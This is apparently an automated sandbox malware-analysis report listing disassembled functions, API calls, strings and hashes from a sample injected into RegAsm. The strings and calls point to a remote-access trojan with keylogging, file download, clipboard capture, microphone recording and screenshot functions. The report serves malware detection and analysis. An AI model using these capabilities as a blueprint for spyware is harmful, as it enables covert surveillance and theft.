                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleOpenProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 39102293-0
                                                                                                                                        • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                                        • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                                                                        • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                                        • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                                                                        APIs
                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                                                          • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2633735394-0
                                                                                                                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                        • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                        • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                                                                                                        • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                                                                                                        • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                                                                                                        • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MetricsSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4116985748-0
                                                                                                                                        • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                        • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                                                        • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                        • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                                                        APIs
                                                                                                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                                                          • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1761009282-0
                                                                                                                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                        • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                        • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                                                        APIs
                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                        • String ID: pow
                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                        • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                        • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                                        • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                        • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 1000655C
                                                                                                                                          • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                          • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                          • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                        • String ID: *?$.
                                                                                                                                        • API String ID: 2667617558-3972193922
                                                                                                                                        • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                        • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                        • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                        • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                        APIs
                                                                                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                                                                                          • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                                                                          • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                          • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                        • String ID: image/jpeg
                                                                                                                                        • API String ID: 1291196975-3785015651
                                                                                                                                        • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                        • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                                                                        • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                        • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Init_thread_footer__onexit
                                                                                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                        • API String ID: 1881088180-3686566968
                                                                                                                                        • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                        • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                                                                        • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                        • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                                                                        APIs
                                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                        • API String ID: 0-711371036
                                                                                                                                        • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                        • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                                        • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                        • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                                                        APIs
                                                                                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                                                                                                          • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                                                                                                          • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                          • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                        • String ID: image/png
                                                                                                                                        • API String ID: 1291196975-2966254431
                                                                                                                                        • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                        • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                                                                        • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                        • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                                                                        APIs
                                                                                                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                                        Strings
                                                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocalTime
                                                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                        • API String ID: 481472006-1507639952
                                                                                                                                        • Opcode ID: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                                                                        • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                                                                        • Opcode Fuzzy Hash: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                                                                        • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32 ref: 0041667B
                                                                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DownloadFileSleep
                                                                                                                                        • String ID: !D@
                                                                                                                                        • API String ID: 1931167962-604454484
                                                                                                                                        • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                                                                        • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                                                                        • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                                                                        • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strlen
                                                                                                                                        • String ID: : $Se.
                                                                                                                                        • API String ID: 4218353326-4089948878
                                                                                                                                        • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                        • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                        • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                        • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                        APIs
                                                                                                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocalTime
                                                                                                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                        • API String ID: 481472006-2430845779
                                                                                                                                        • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                        • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                                                                        • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                        • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                                                                        APIs
                                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExistsFilePath
                                                                                                                                        • String ID: alarm.wav$hYG
                                                                                                                                        • API String ID: 1174141254-2782910960
                                                                                                                                        • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                        • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                                                                        • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                        • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                                                        • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                        • String ID: Online Keylogger Stopped
                                                                                                                                        • API String ID: 1623830855-1496645233
                                                                                                                                        • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                        • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                                                        • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                        • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                                                        APIs
                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                          • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                        • String ID: Unknown exception
                                                                                                                                        • API String ID: 3476068407-410509341
                                                                                                                                        • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                        • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                        • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                        • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                        APIs
                                                                                                                                        • waveInPrepareHeader.WINMM(004C9000,00000020,?), ref: 00401849
                                                                                                                                        • waveInAddBuffer.WINMM(004C9000,00000020), ref: 0040185F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wave$BufferHeaderPrepare
                                                                                                                                        • String ID: XMG
                                                                                                                                        • API String ID: 2315374483-813777761
                                                                                                                                        • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                                        • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                                        APIs
                                                                                                                                        • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocaleValid
                                                                                                                                        • String ID: IsValidLocaleName$kKD
                                                                                                                                        • API String ID: 1901932003-3269126172
                                                                                                                                        • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                        • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                                                        • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                        • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
